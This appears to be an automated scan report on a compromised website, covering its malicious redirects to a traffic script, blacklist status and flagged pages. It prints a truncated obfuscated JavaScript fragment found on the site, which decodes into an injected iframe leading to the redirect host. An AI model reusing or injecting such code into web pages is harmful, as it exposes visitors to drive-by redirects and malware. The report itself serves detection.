Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://vividxxx.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: vividxxx.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 23 Jun 2014 16:22:11 GMT Location: http://aug1969.sakura.ne.jp/saian/traf.php Server: Apache/2.2.25 Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://aug1969.sakura.ne.jp/saian/traf.php (imitation of visitor from search engine) GET /saian/traf.php HTTP/1.1 Host: aug1969.sakura.ne.jp Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Mon, 23 Jun 2014 16:22:12 GMT Location: http://localhost/ Server: Apache/2.2.25 Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://vividxxx.net/ | 200 OK Content-Length: 6114 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,154,162,175,160,157,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,154,162,175,160,157,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,145,171,153,65,75,72,75,62,167,145,157,171,166,145,62,162,151,62,156,164,63,167,145,155,145,162,63,170,166,145,152,62 Antivirus reports:
| ||
http://vividxxx.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vividxxx.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vividxxx.net/
Result: vividxxx.net is not infected or malware details are not published yet.
Result: vividxxx.net is not infected or malware details are not published yet.